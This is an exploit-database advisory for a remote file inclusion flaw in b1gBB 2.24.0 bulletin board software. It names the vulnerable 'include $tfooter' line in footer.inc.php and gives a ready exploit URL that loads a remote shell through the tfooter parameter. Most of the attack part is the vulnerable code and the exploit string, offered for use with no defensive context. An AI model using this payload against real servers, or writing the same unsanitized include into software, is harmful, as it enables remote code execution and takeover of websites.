id: 1972
date: 06/24/2007
title: b1gbb 2.24.0 (footer.inc.php tfooter) Remote File Inclusion Vulnerability
author: Rf7awy
cves: 

=========================================================================
b1gbb 2.24.0 (footer.inc.php tfooter) Remote File Inclusion Vulnerability
=========================================================================



# b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion
Vulnerabilities

# D.Script :
     http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip

# V.Code :
     include $tfooter

# In :
     footer.inc.php

# Exploits :
http://www.name/path/footer.inc.php?tfooter=shell?


# Discovered by:
     Rf7awy

thanks
Mahmood_ali


#  0day.today [2023-03-22]  #